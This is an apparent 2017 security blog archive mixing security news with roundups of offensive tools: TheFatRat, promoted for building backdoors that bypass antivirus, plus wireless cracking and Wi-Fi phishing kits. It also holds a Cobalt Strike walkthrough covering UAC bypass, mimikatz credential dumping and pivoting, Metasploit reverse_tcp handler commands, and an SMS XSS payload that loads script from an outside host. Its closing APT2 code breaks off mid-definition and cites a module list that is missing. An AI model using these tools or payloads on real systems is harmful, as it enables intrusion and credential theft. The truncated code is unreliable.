Thursday 29 June 2017

German hacker uses Pastebin to spread the Houdini worm

According to foreign media reports on the 27th, Recorded Future security researchers found a German hacker spreading the Houdini worm through the Pastebin website.
The investigation shows that the Houdini worm developer also appears to be one of the founders of MoWare HFD, a variant of open-source ransomware. The researchers say that malicious Visual Basic scripts posted on Pastebin peaked in August, October, and March, and that most of these scripts were used by an attacker to spread the Houdini worm. This type of attack first appeared in 2013 and was updated in 2016.

Recorded Future found 213 malicious posts on Pastebin, pointing to one parent domain with 105 subdomains. Analysis shows that the domain and its subdomains come from a dynamic DNS provider. Because the attacker published the Houdini scripts through other users' accounts, the only information the researchers could confirm is the German registrant Mohammed Raad and the associated email address "vicsworsbaghdad@gmail.com".

A Google search on that information turned up a Facebook profile using the same details. The investigation shows that Mohammed Raad is one of the main members of the German branch of Anonymous. In addition, the Facebook profile contains the member's recent conversations about the MoWare HFD ransomware.

Red Hat Enterprise Linux 7.4 Beta release

Red Hat has announced the latest beta of Red Hat Enterprise Linux 7.x, which includes bug fixes and some new features for the 7.x series.

The new version continues to focus on the security of the system. To protect against the latest threats and provide a more secure platform for mission-critical deployments, Red Hat Enterprise Linux 7.4 Beta introduces several new security features, including:
  • Support for Network Bound Disk Encryption (NBDE), a mechanism that reduces the management burden of disk encryption at scale
  • OpenSSL HTTP/2.0 enhancements: several new Transport Layer Security (TLS) protocol features, such as Application-Layer Protocol Negotiation (ALPN), are now available in OpenSSL
  • Updated auditing features, designed to make it easier for administrators to filter the events the audit system records, gather more information from critical events, and make sense of large volumes of records
For additional information, refer to the company's announcement and release notes, and to the download page.

TheFatRat v1.9: Create backdoor & bypass AV

An easy tool to generate backdoors and to carry out post-exploitation attacks such as browser attacks and DLL injection. The tool compiles malware with a popular payload; the compiled malware can then be executed on Windows, Android and macOS. Malware created with this tool is also claimed to bypass most AV software.

Automating metasploit functions

  • Create backdoors for Windows, Linux, Mac and Android
  • Bypass antivirus backdoors
  • Checks for the Metasploit service and starts it if not running
  • Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android, Mac and others
  • Start multiple meterpreter reverse_tcp listeners
  • Fast search in searchsploit
  • Bypass AV
  • File pumper
  • Create backdoors with other techniques
  • Autorun script for listeners (easy to use)
  • Drop into msfconsole
  • Some other fun stuff

Change log v1.9

  • v1.9.4 – Fatrat will be in full terminal mode, Powerstage tool added, setup script rebuilt
  • v1.9.3 – Added update script
  • v1.9.3 – Dex2Jar will from now on be installed manually on the user's system by the Fatrat setup (reason: the Kali repo still uses an old version)
  • v1.9.3 – Updated Android build tools to v26 RC1 & Android Platform v25-R03
  • v1.9.3 – Updated Dana James Traversie's backdoor-apk to 0.2.2 in Fatrat / added openssl to setup
  • v1.9.2 – The msfvenom Android RAT will be signed with an Android certificate, so it can be installed properly
  • v1.9.2 – Implemented default Lhost & Lport config in Fatrat & the powerful shell creator
  • v1.9.2 – Fixed payload in pnwinds option 2
  • v1.9.2 – Implemented stop functions in pnwinds
  • v1.9.2 – New signing process in the old-method backdoor APK & option to create a listener
  • v1.9.2 – Implemented the possibility for the user to save msfconsole listeners
  • v1.9.2 – Fixes in Microsploit
  • v1.9.2 – Implemented local IP, public IP & hostname display in powerfull.sh
  • v1.9.2 – Implemented local IP, public IP & hostname display before the user sets Lhost
  • v1.9.2 – Implemented log creation for Microsploit & fixed bugs
  • v1.9.2 – Added an effective way to detect the user's Linux distribution
  • v1.9.2 – Setup.sh (patched)
  • v1.9.2 – Bug in Microsploit (patched)
  • v1.9.2 – Deleted some functions and variables
  • v1.9.1 – Implemented Microsploit (Office Exploitation Tool)
  • v1.9b – Implemented Backdoor-apk from Dana James Traversie in this version (fewer tools to install during setup.sh)
  • v1.9.0 – Updated setup.sh script
  • v1.9.0 – Deleted some variables and functions
  • v1.9.0 – Fixed typos and bugs
  • v1.9.0 – Backdoored APKs have a new payload-hiding method in the RAT APK to avoid detection
  • v1.9.0 – APK (5) RAT build totally changed (adapted the backdoor-apk script to Fatrat so both work together)
  • v1.9.0 – Apktool is no longer installed by setup.sh; the same applies to dx and zipalign (apktool in the Debian repo is 2.2.1, which has a bug that produces errors when compiling the APKs, so apktool and the Android tools were updated to the latest version 25.0.2 and embedded in the tools directory of Fatrat)

Download & Installation

git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatRat
chmod +x setup.sh && ./setup.sh
Source: Github

Modern JavaScript

Keep up to date with the evolving world of JavaScript.
It's not uncommon these days to see people complaining about how complex JavaScript development seems to have become. If you're learning JS, it won't take long for you to be exposed to the size of the ecosystem and the sheer number of moving pieces you need to understand (at least conceptually) to build a modern web application.
Package management, linting, transpilation, module bundling, minification, source maps, frameworks, unit testing, hot reloading… it can't be denied that this is a lot more complex than just including a couple of script tags in your page and FTPing it up to the server. This anthology is a collection of articles, hand-picked from SitePoint's JavaScript channel, with the aim of giving you a head start on modern JavaScript development. Use this eBook to keep up to date with the latest developments!

Download

Viruses, Spyware, Malware, etc. Explained: Understanding Online Threats

When you start to think about all the things that could go wrong when browsing the Internet, the web starts to look like a pretty scary place. Luckily, Internet users as a whole are getting far more savvy, and better at recognizing risky online behavior.
While pages with a dozen download buttons – or auto-checked boxes that tricked us into downloading things we didn’t want – are no longer quite as effective as they once were, that doesn’t mean there aren’t hackers out there right now trying to come up with new methods of deception. In order to protect ourselves from these threats it’s important to understand just what they are, and how they differ. Dive into this guide to learn more!

Download

NTFS Forensics Malware and vulnerabilities

Top 3 Search Engine for Penetration Tester

Here I will introduce three search engines for finding exposed hosts and vulnerable services.
  1. Shodan
    Shodan, which describes itself as the "computer search engine", was built by the American John Matherly over nearly ten years; it can search almost every industrial control system and networked device in the US (and far beyond) that is connected to the Internet. Unlike a traditional search engine such as Google, which uses web crawlers to traverse whole sites, Shodan works at the level of the services behind the Internet: it probes all kinds of ports on all kinds of devices and never stops looking for servers, cameras, printers, routers and other equipment attached to the network. Shodan gathers information from roughly 500 million servers around the clock every month.
    The engine can search for and locate any server or device connected to the network. Shodan works by auditing the banners (the identification strings) that services on various ports return and generating search results from them, so to use it well you need some understanding of service banners.
    Numerous industrial control computers, water works, power grids and other automation systems are connected to the network, some of them with vulnerabilities, so that even moderately skilled attackers can get into these systems. Industrial control computers are usually protected by firewalls, but once a system is reachable from the network that protection can easily be eroded. For a Shodan tutorial, please visit here.
  2. ZoomEye
    ZoomEye is a search engine for cyberspace that lets the user find specific network components (IPs, services, etc.). The ZoomEye API is a web service that provides convenient access to ZoomEye's features, data and information over HTTPS. The platform API lets developers automate, extend and integrate with ZoomEye: you can use it to programmatically create apps, provision add-ons and perform automated tasks.
  3. Censys
    Censys is a search engine that allows computer scientists to ask questions about the devices and networks that compose the Internet. Driven by Internet-wide scanning, Censys lets researchers find specific hosts and create aggregate reports on how devices, websites and certificates are configured and deployed. [more information]
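All three engines key their search on service banners, so it helps to see what a banner actually contains and how a query is matched against it. The following is an added example, not code from Shodan, ZoomEye or Censys: it parses the identification strings that SSH, HTTP and FTP services return on connect, and then filters the results with a tiny key:value query in the Shodan style. The hosts, ports and banners are constructed sample data, and the query syntax is an assumption for illustration.

```python
"""Banner fingerprinting, in the style of the search engines above.
Added example (not code from Shodan, ZoomEye or Censys): parses the
identification strings that SSH, HTTP and FTP services return on
connect, then filters the results with a small key:value query."""
import re
from dataclasses import dataclass

# Constructed sample data: (ip, port, raw banner) as a scanner would see it.
SAMPLE_BANNERS = [
    ("203.0.113.10", 22, "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2\r\n"),
    ("203.0.113.10", 80, "HTTP/1.1 200 OK\r\nServer: Apache/2.4.18 (Ubuntu)\r\n\r\n"),
    ("203.0.113.11", 21, "220 ProFTPD 1.3.5 Server (Debian) [::ffff:203.0.113.11]\r\n"),
    ("203.0.113.12", 22, "SSH-2.0-dropbear_2014.66\r\n"),
    ("203.0.113.13", 8080, 'HTTP/1.0 401 Unauthorized\r\nServer: Boa/0.94.14rc21\r\nWWW-Authenticate: Basic realm="Router"\r\n\r\n'),
    ("203.0.113.14", 23, "\xff\xfb\x01\xff\xfb\x03login: "),  # telnet prompt: no product string at all
]

@dataclass
class Fingerprint:
    ip: str
    port: int
    service: str
    product: str
    version: str

# One pattern per banner format; group 1 = product, group 2 = version.
PATTERNS = [
    ("ssh",  re.compile(r"^SSH-(?:1\.99|2\.0|1\.5)-([A-Za-z]+)[_-]?(\d[\w.]*)")),
    ("http", re.compile(r"^Server:\s*([A-Za-z-]+)/(\d[\w.-]*)", re.M)),
    ("ftp",  re.compile(r"^220[ -].*?([A-Za-z-]*FTPd?)\s+(\d[\w.]*)", re.I)),
]

def fingerprint(ip, port, banner):
    """Map a raw banner to (service, product, version); 'unknown' if nothing matches."""
    for service, pattern in PATTERNS:
        m = pattern.search(banner)
        if m:
            return Fingerprint(ip, port, service, m.group(1), m.group(2))
    return Fingerprint(ip, port, "unknown", "", "")

def index(banners=SAMPLE_BANNERS):
    """Fingerprint every captured banner: this list is what a query runs against."""
    return [fingerprint(ip, port, banner) for ip, port, banner in banners]

def search(fps, query):
    """Shodan-like filter, e.g. 'product:openssh version:7.2 port:22'.
    ip/port/service/product must match exactly (case-insensitive); version matches by prefix."""
    terms = [t.split(":", 1) for t in query.split() if ":" in t]
    def matches(fp):
        for key, value in terms:
            have = str(getattr(fp, key, "")).lower()
            if key == "version":
                if not have.startswith(value.lower()):
                    return False
            elif have != value.lower():
                return False
        return True
    return [fp for fp in fps if matches(fp)]

if __name__ == "__main__":
    for fp in search(index(), "service:ssh"):
        print(fp)
```

The telnet entry is there on purpose: a service that announces nothing useful lands in the "unknown" bucket, which is exactly the kind of host that only turns up when you query by port rather than by product.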

How to Write Fully Undetectable Malware

Crypto 101

Want to know how to exploit a common cryptographic flaw, forge administrator cookies, or recover passwords?
This is an introductory course on cryptography, freely available for programmers of all ages and skill levels. It comes with everything you need to understand complete systems such as SSL/TLS: block ciphers, stream ciphers, hash functions, message authentication codes, public-key encryption, key agreement protocols, and signature algorithms.
Crypto 101 is intended as an introduction to cryptography for programmers of any skill level. It starts with very simple primitives and gradually introduces new ones, demonstrating why they are necessary. Eventually all of this is put together into complete, practical cryptosystems such as TLS, GPG and OTR.
If you are an everyday programmer who is also interested in how cryptosystems work, what are you waiting for?
Offered Free by: lvh

Download

15 things against DDoS attacks

Today I am going to describe 15 things you can do against DDoS attacks.
DDoS attacks fall mainly into two categories, bandwidth-exhaustion attacks and resource-exhaustion attacks. To effectively curb both types, you can follow the steps listed in this article.

To combat DDoS (distributed denial of service) attacks, you need a clear understanding of what is happening during the attack. Simply put, a DDoS attack achieves its purpose either by exploiting server vulnerabilities or by consuming server resources (memory, disk, connection tables and so on). You can follow the steps listed below:
  1. If only a few computers are the source of the attack and you have identified their IP addresses, place an ACL (access control list) on the firewall or server to block access from those IPs. If possible, change the IP address of the web server for a period of time; however, if the attacker resolves your newly configured IP by querying your DNS server, this no longer helps.
  2. If you are sure the attack comes from a particular country, consider blocking IP ranges from that country, at least for a while.
  3. Monitor incoming network traffic. This way you know who is visiting your network, can spot anomalous visitors, and can analyze the logs and source IPs afterwards. Before a large-scale attack, an attacker may use a small number of probes to test the robustness of your network.
  4. The most effective (and most expensive) solution for bandwidth-consuming attacks is to buy more bandwidth.
  5. You can also use high-performance load-balancing software across multiple servers deployed in different data centers.
  6. Use load balancing for the web and other resources, and apply the same strategy to protect DNS.
  7. Optimize resource usage to improve the web server's load capacity. For example, on Apache you can install the apachebooster plug-in, which integrates with Varnish and nginx to cope with sudden increases in traffic and memory footprint.
  8. Use highly scalable DNS appliances to protect against DDoS attacks on DNS. Consider a commercial solution such as Cloudflare, which can provide DDoS protection for DNS and TCP/IP from layer 3 to layer 7.
  9. Enable the anti-IP-spoofing function on the router or firewall. On a Cisco ASA firewall this is more convenient to configure than on a router: in ASDM (Cisco Adaptive Security Device Manager), click "Firewall" under "Configuration", find "Anti-Spoofing", and click Enable. You can also use an ACL on the router to prevent IP spoofing: first create an ACL for the network, then apply it to the Internet-facing interface.
  10. Use third-party services to protect your site. Many companies offer such services, providing high-performance network infrastructure that helps you resist denial-of-service attacks, for only a few hundred dollars a month.
  11. Pay attention to the security configuration of the server to avoid resource-exhaustion DDoS attacks.
  12. Listen to the advice of experts and prepare an emergency response plan for attacks in advance.
  13. Monitor the network and web traffic. If you can configure multiple analysis tools, such as StatCounter and Google Analytics, you can understand traffic patterns more visually and get more information from them.
  14. Protect DNS against DNS amplification attacks.
  15. Disable ICMP on the router, and enable it only when testing requires it. Also consider the following policies when configuring the router: flow control, packet filtering, half-open connection timeouts, discarding malformed packets, dropping packets with forged source addresses, SYN thresholds, and disabling ICMP and UDP broadcast.
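Steps 1, 3 and 13 above boil down to one loop: watch incoming requests, find the few sources that dominate, and feed them into an ACL. The following Python is an added example, not from the original article: it parses access-log lines (constructed sample data), finds any source IP whose peak request rate within a sliding window exceeds a threshold, and emits block-list entries. The window, the threshold and the Cisco-style ACL syntax are assumptions; adapt them to your firewall.

```python
"""Added example for steps 1, 3 and 13 above (not from the original article):
find the few source IPs that dominate incoming traffic and turn them into
block-list entries. Log lines are constructed sample data in common
access-log format; window, threshold and ACL syntax are assumptions."""
import re
from collections import Counter, defaultdict
from datetime import datetime, timezone

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def _line(ip, second, path="/"):
    """Build one constructed access-log line at 10:00:<second> UTC on 29 Jun 2017."""
    ts = datetime(2017, 6, 29, 10, 0, second, tzinfo=timezone.utc).strftime(TS_FMT)
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" 200 512'

# Constructed sample: one source sends 20 req/s for 5 s, two others browse normally.
SAMPLE_LOG = (
    [_line("203.0.113.7", s) for s in range(5) for _ in range(20)]
    + [_line("192.0.2.5", s, "/index.html") for s in range(30)]
    + [_line("198.51.100.9", s, "/login") for s in range(0, 30, 3)]
)

def parse(lines):
    """Yield (ip, timestamp) for every well-formed line; skip junk silently."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m["ip"], datetime.strptime(m["ts"], TS_FMT)

def flood_sources(lines, window=10, threshold=50):
    """Return {ip: peak requests seen in any `window`-second span} for IPs
    whose peak exceeds `threshold`. Rates, not totals, so a slow crawler
    that runs all day is not flagged while a short burst is."""
    per_second = defaultdict(Counter)            # ip -> Counter(epoch_second -> hits)
    for ip, ts in parse(lines):
        per_second[ip][int(ts.timestamp())] += 1
    offenders = {}
    for ip, hits in per_second.items():
        seconds = sorted(hits)
        lo, running, peak = 0, 0, 0
        for sec in seconds:                      # sliding window over active seconds
            running += hits[sec]
            while sec - seconds[lo] >= window:
                running -= hits[seconds[lo]]
                lo += 1
            peak = max(peak, running)
        if peak > threshold:
            offenders[ip] = peak
    return offenders

def acl_entries(offenders):
    """Cisco-style extended ACL lines (syntax assumed; adapt to your device)."""
    return [f"deny ip host {ip} any" for ip in sorted(offenders)] + ["permit ip any any"]

if __name__ == "__main__":
    print("\n".join(acl_entries(flood_sources(SAMPLE_LOG))))
```

Two practical caveats: a block list built from access logs only catches attacks that reach the application (a bandwidth-exhaustion flood has to be stopped upstream, as steps 4, 8 and 10 say), and a source that is still flooding after you block it by address is usually spoofing, which is what step 9 is for.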

Monday 26 June 2017

Get Wi-Fi password with only text message to the router

Recently, German security researcher Jan Hörsch found a remarkable vulnerability in a router: send it a text message, and it replies with the administrator password and the Wi-Fi password as a text message.
What is the message?
<script src=//n.ms/a.js></script>

The vulnerable router is the TP-Link M5350, a portable 3G router. As a 3G router, the M5350 supports SMS messaging, but the SMS feature does not properly filter the message content where it is displayed, so script in the message body is executed instead of being shown as text: a cross-site scripting hole.
Similar holes are quite common in Internet products, but ones that can cause this kind of impact are rare; on the face of it, TP-Link's internal security process failed to notice it.
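The bug class is easier to reason about with the two render paths side by side. The following is an added example, not TP-Link's firmware: a router-style web UI that drops SMS bodies straight into its HTML lets a message like the one above execute as script when an administrator views the inbox, while escaping the body on output turns it back into inert text. The page template and the sender numbers are assumptions for illustration; the message text is the payload quoted above.

```python
"""Added example, not TP-Link's firmware: the bug class described above.
A router web UI that drops SMS bodies straight into its HTML lets a message
like the one quoted on this page execute as script when an administrator
views the inbox; escaping on output turns it back into inert text.
The page template and sender numbers are assumptions for illustration."""
import html

# The SMS body quoted in the write-up above, used here only as test input.
PAYLOAD_SMS = '<script src=//n.ms/a.js></script>'

# Constructed inbox: one hostile message, one ordinary one.
SAMPLE_INBOX = [
    ("+491511234567", PAYLOAD_SMS),
    ("+491519876543", "Meeting at 10 & bring the router password"),
]

def render_inbox_vulnerable(messages):
    """Bug: untrusted SMS fields are interpolated as raw HTML."""
    rows = "".join(f"<tr><td>{sender}</td><td>{body}</td></tr>" for sender, body in messages)
    return f'<table id="sms">{rows}</table>'

def render_inbox_fixed(messages):
    """Fix: escape every untrusted field for the HTML text context at output time."""
    rows = "".join(
        f"<tr><td>{html.escape(sender, quote=True)}</td>"
        f"<td>{html.escape(body, quote=True)}</td></tr>"
        for sender, body in messages
    )
    return f'<table id="sms">{rows}</table>'

def has_live_script(page):
    """Review check: does a real <script tag survive in the rendered page?"""
    return "<script" in page.lower()

if __name__ == "__main__":
    print("vulnerable:", has_live_script(render_inbox_vulnerable(SAMPLE_INBOX)))
    print("fixed:     ", has_live_script(render_inbox_fixed(SAMPLE_INBOX)))
```

In the report the injected script presumably runs inside the router's own web interface with the administrator's session, where the same SMS feature is available to send the credentials back out; escaping on output, as above, is what stops it from running at all. The sender field is escaped too, because an attacker controls the originating number just as much as the body.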

Hijacker v1-stable: Wireless Toolkit Application for Android

Hijacker is a graphical user interface for the wireless auditing tools airodump-ng, aireplay-ng and mdk3. It offers a simple UI to use these tools without typing commands in a console or copying and pasting MAC addresses.
This application requires an Android device with a wireless adapter that supports monitor mode. A few Android devices do, but none of them natively, so you will need custom firmware. The Nexus 5 and any other device using the BCM4339 chipset work with Nexmon (as does the BCM4358, although injection is not yet supported there, so no aireplay or mdk3). Devices that use the BCM4330 can use bcmon. An alternative is an external adapter that supports monitor mode on Android, connected with an OTG cable.
The required tools are included in the app. To install them, go to Settings and click "Install Tools"; this installs everything in the directory you select. If you have already installed them, you don't have to do anything. You can also keep them in any directory you want and set the directories in Settings, though this might cause the aircrack-ng suite not to find the wireless tools. The Nexmon driver and management utility are also included.
Root is also necessary, as these tools need root to work. If you don’t grant root permissions to it, it hangs… for some reason… don’t know why…
Features:
  • View a list of access points and stations (clients) around you (even hidden ones)
  • View the activity of a network (by measuring beacons and data packets) and its clients
  • Deauthenticate all the clients of a network
  • Deauthenticate a specific client from the network it’s connected
  • MDK3 Beacon Flooding with custom SSID list
  • MDK3 Authentication DoS for a specific network or to everyone
  • Try to get a WPA handshake or gather IVs to crack a WEP network
  • Statistics about access points (only encryption for now)
  • See the manufacturer of a device (AP or station) from a OUI database (pulled from IEEE)
  • See the signal power of devices and filter the ones that are closer to you
  • Leave the app running in the background, optionally with a notification
  • Copy commands or MAC addresses to clipboard, so you can run them in a terminal if something goes wrong
  • Include the tools
  • Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter)
  • .cap files cracking with custom wordlist
  • Save captured packets in .cap file
  • Create custom commands to be ran on an access point or a client with one click
Installation:
Make sure:
  • you are on Android 5+
  • you are rooted. SuperSU is required. If you are on CM, install SuperSU
  • have installed busybox (opened and installed the tools)
  • have a firmware to support Monitor Mode on your wireless interface
APK Download: Hijacker-release-v1.apk Source: https://github.com/chrisk44/Hijacker

Fern Wifi Cracker: wireless security audit tools

Fern Wifi Cracker is a wireless security auditing and attack program written in Python using the Python Qt GUI library. It can crack and recover WEP/WPA/WPS keys and also run other network-based attacks on wireless or Ethernet-based networks.

 

Prerequisites

The program requires the following to run properly. On Debian-based systems these dependencies can be installed with the package manager ("apt-get install <package>"); otherwise download and install them manually:
1. Aircrack-NG
2. Python-Scapy
3. Python Qt4
4. Python
5. Subversion
6. Xterm
7. Reaver (for WPS attacks)
8. Macchanger

Features


Fern Wifi Cracker currently supports the following features:
1. WEP Cracking with Fragmentation, Chop-Chop, Caffe-Latte, Hirte, ARP Request Replay or WPS attacks
2. WPA/WPA2 Cracking with Dictionary or WPS based attacks
3. Automatic saving of key in database on successful crack
4. Automatic Access Point Attack System
5. Session Hijacking (Passive and Ethernet Modes)
6. Access Point MAC Address Geo Location Tracking
7. Internal MITM Engine
8. Bruteforce Attacks (HTTP,HTTPS,TELNET,FTP)
9. Update Support

Installation

Download Fern-Wifi-Cracker here. Installation on systems that support Debian packages:

root@host:~# dpkg -i Fern_Open_Source_2.2_all.deb

The source code for the program can be fetched using the following command on terminal

root@host:~# svn checkout http://github.com/savio-code/fern-wifi-cracker/trunk/Fern-Wifi-Cracker/

BoopSuite: wireless auditing and security testing toolkit

BoopSuite is an up and coming suite of wireless tools designed to be easy to use and powerful in scope, written in python with semicolons, because I hate children.

Installation

git clone https://github.com/M1ND-B3ND3R/BoopSuite.git
cd BoopSuite
pip install -r requirements.txt
chmod +x setup.py
./setup.py

Usage

To start sniffing:
boopsniff -i wlan1mon
To specify a channel:
boopsniff -i wlan1mon -c 6
Boop also works on the 5ghz spectrum if you have a supporting card:
boopsniff -i wlan1mon -f 5
Reporting can also be enabled:
boopsniff -i wlan1mon -r ~/report.txt
If some processes are interfering then you can preemptively kill them with:
boopsniff -i wlan1mon -k
If you want to see unassociated clients:
boopsniff -i wlan1mon -u
If you want to filter by a specific AP mac address:
boopsniff -i wlan1mon -a xx:xx:xx:xx:xx:xx
New Update includes a gui tool:
boopsniff_gui
Set card to monitor mode:
boop -i wlan1
Set card to managed mode:
boop -i wlan1mon
Set card to a specific name:
boop -i wlan1 -n boop1
Note: this will enable or disable monitor mode accordingly.
Set channel on card:
boop -i wlan1 -c 11
Note: this does error checking if you specify a channel the card doesn't support, and is ready for cards supporting the 5 GHz band.
Kill any interfering tasks:
boop -i wlan1 -k
Put it all together:
boop -i wlan1 -n boop1 -c 11 -k
NOTE: boop will always switch the mode from managed to monitor and vice versa.
Source: Github

[Collection] Wireless Penetration Testing Toolkit

  1. wifite
    Link Project: https://github.com/derv82/wifite
    wifite is a wireless security testing tool written in Python. It is essentially a wrapper around the command-line tools aircrack-ng, reaver, pyrit, cowpatty, tshark and several others, but it simplifies the interaction between them: a single command starts the whole process, with detailed descriptions and guidance along the way, so its ease of use stands out.
  2. wifiphisher
    Link Project: https://github.com/sophron/wifiphisher
    Obtains Wi-Fi passwords with a relatively novel idea: rather than cracking them, it phishes them. The tool asks for two wireless cards: one sends deauthentication frames at the target AP so that its clients are disconnected, while the other brings up a rogue AP with the same SSID so that the clients reconnect to it; when they then try to reach the Internet they are forcibly redirected to a (customizable) phishing page. Card compatibility is also good.
  3. wifi-pumpkin
    Link Project: https://github.com/P0cL4bs/WiFi-Pumpkin
    A very friendly graphical user interface and good handling; my favorite tool for setting up phishing Wi-Fi attacks, with a rich set of functions, excellent ease of use and very good compatibility. The author is actively updating it, so this fun project is worth following.
  4. fruitywifi
    Link Project: https://github.com/xtr4nge/FruityWifi
    FruityWifi is an open source tool to audit wireless networks. It also uses the web as its interactive interface; ease of use is good and it is rich in features and plug-ins.
  5. mana toolkit
    Link Project: https://github.com/sensepost/mana
    A fairly complete set of functions; it uses net-creds and sslstrip together with a rogue AP to carry out man-in-the-middle attacks.
  6. 3vilTwinAttacker
    Link Project:https://github.com/wi-fi-analyzer/3vilTwinAttacker
    Interface much like wifi-pumpkin: a good graphical interface, a very good overall experience, good ease of use and good compatibility. The author has hardly updated it recently.
  7. ghost-phisher
    Link Project: http://tools.kali.org/information-gathering/ghost-phisher
    It has a good graphical interface but almost no fault tolerance, and many options are easily confused; still, overall it is very pleasant to use. It can set up a rogue AP with one click and provides an interface for the DHCP and DNS services, making it easy to launch a variety of man-in-the-middle attacks. Ease of use and compatibility are good. The Kali team has taken over updates of the original repo.
  8. fluxion
    Link Project: https://github.com/wi-fi-analyzer/fluxion

Penetration Testing on an Intranet Network with Cobalt Strike

Introduction

Cobalt Strike is software for Adversary Simulations and Red Team Operations. Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network. While penetration tests focus on unpatched vulnerabilities and misconfigurations, these assessments benefit security operations and incident response.

Environment

  • Target: web server is an internal network host
  • Attacker: linux vps

Penetration Testing

Start Cobalt Strike's team server:
./teamserver vps_ip password
After connecting the client, we first create a listener as before and then generate an EXE payload (this was covered in the previous article, so it is not repeated here). We then upload the EXE through the webshell and execute it, and the host appears online in the client.

But our privileges are not very high, just those of the web server account, and the usual privilege-escalation scripts have been tried without success. What now?
In fact, this can be handled from within Cobalt Strike, using Bypass UAC.
Right-click the target, then Access -> Bypass UAC, and wait. The output will tell you whether it succeeded; on success, a new entry for the host appears in the list with the user name marked with an asterisk (*), as shown below.

Now we can grab passwords. Cobalt Strike also integrates mimikatz: Access -> Run mimikatz, and the passwords are dumped.

If you do not want to dig through the output for account passwords yourself, you can view them under Credentials, which is convenient.
For pivoting into the internal network, deploying a SOCKS proxy on a compromised host lets you use your local tools against the network. Cobalt Strike integrates this too: Pivoting -> SOCKS Server. Once established, it is shown as below:
Then we can proxy our internal-network attacks through proxychains.
Of course, a powerful collaboration platform and penetration weapon would hardly lack the common scanning functions.
Cobalt Strike integrates a port scanner, found under Explore -> Port Scan.
The default scan range is /24, and several scanning methods can be chosen.
We can also use Explore -> Net View to discover live hosts on the internal network.
If you think these features are too few, Cobalt Strike can also be used together with msf. First we set up a handler in msf with the following commands:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.146.178
lhost => 192.168.146.178
msf exploit(handler) > set lport 2222
lport => 2222
msf exploit(handler) > exploit -j

Then we create a new listener in Cobalt Strike, selecting windows/foreign/reverse_tcp,

and then select the following:
Select the listener just created; when we return to msf, we see that the session has arrived.
Sometimes we need to get onto a machine's desktop, for example because some software has to be opened in a desktop environment, or because some administrators leave things on the desktop. Cobalt Strike has thought of this too, so we can also enter the desktop environment through it.

[BlackHat Tool] apt2: automated penetration toolkit

APT2 – An Automated Penetration Testing Toolkit

This tool will perform an Nmap scan, or import the results of a scan from Nexpose, Nessus, or Nmap. The processed results are used to launch exploit and enumeration modules according to the configurable Safe Level and the enumerated service information.
All module results are stored on localhost and are part of APT2's Knowledge Base (KB). The KB is accessible from within the application and allows the user to view the harvested results of an exploit module.

Change log v1.0-20170613

+ Added packaging and fix apt2_whois
+ fixed issues with misc data files and installing packages.
+ module: temp fix till I get time to do a better one.

Setup

NOTE: APT2 is currently only tested on Linux based OSes. If you can confirm that it works on other OSes, please let us know.
On Kali Linux, install the required Python libraries with pip:
  • pip install python-nmap
  • pip install pysmb
  • pip install yattag
  • pip install scapy
  • pip install ftputil
  • pip install msgpack-python

Current External Program/Script Dependencies

To make full use of all of APT2's modules, the following external dependencies should be installed on your system:
convert, dirb, hydra, java, john, ldapsearch, msfconsole, nmap, nmblookup, phantomjs, responder, rpcclient, secretsdump.py, smbclient, snmpwalk, sslscan, xwd

Configuration (Optional)

APT2 uses the default.cfg file in the root directory. Edit this file to configure APT2 to run as you desire.
Current options include:
  • metasploit
  • nmap
  • threading
Metasploit RPC API (metasploit)
APT2 can utilize your host's Metasploit RPC interface (MSGRPC). Additional information can be found here: https://help.rapid7.com/metasploit/Content/api-rpc/getting-started-api.html
NMAP
Configure NMAP scan settings to include the target, scan type, scan port range, and scan flags. These settings can be configured while the program is running.
Threading
Configure the number of the threads APT2 will use.

Run:

No Options:

python apt2 or ./apt2

With Configuration File

python apt2 -C <config.txt>

Import Nexpose, Nessus, or NMap XML

python apt2 -f <nmap.xml>

Specify Target Range to Start (the -f flag takes input files; the usage text below names --target for initial targets)

python apt2 --target 192.168.1.0/24

Safe Level

Safe levels indicate how safe a module is to run against a target. The scale runs from 1 to 5, with 5 being the safest. The default configuration uses a Safe Level of 4, but it can be set with the -s or --safelevel command-line flags.
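The import step, the Knowledge Base and the Safe Level gate together form the core loop of a tool like this, and it is worth seeing it in a few lines. The following Python is an added example, not APT2's own code: it parses an Nmap XML document, records the open services per host in a small knowledge base, and then decides which modules may run under a given minimum Safe Level (1 = most intrusive, 5 = safest, as described above). The XML, the module table and the per-module safe-level values are constructed for illustration; the module names are taken from the list below, but their levels here are assumptions, not APT2's.

```python
"""Added example (not APT2's own code): the scan-import -> module-selection
loop that APT2 describes. It parses an Nmap XML document, records the open
services in a small knowledge base, and picks which modules may run under a
minimum Safe Level (1 = most intrusive, 5 = safest). The XML, module table
and safe-level values below are constructed for illustration."""
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed Nmap XML, in the shape `nmap -sV -oX` produces (trimmed to the parts used).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.0.2.0/29">
  <host><status state="up"/><address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd" version="3.0.3"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="filtered"/><service name="ms-wbt-server"/></port>
    </ports></host>
  <host><status state="up"/><address addr="192.0.2.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd" version="2.4.18"/></port>
      <port protocol="tcp" portid="161"><state state="open"/><service name="snmp"/></port>
    </ports></host>
</nmaprun>"""

# Module table: name -> (service it targets, safe level). Names come from the module
# list on this page; the levels are assumed for the example, not APT2's real values.
MODULES = {
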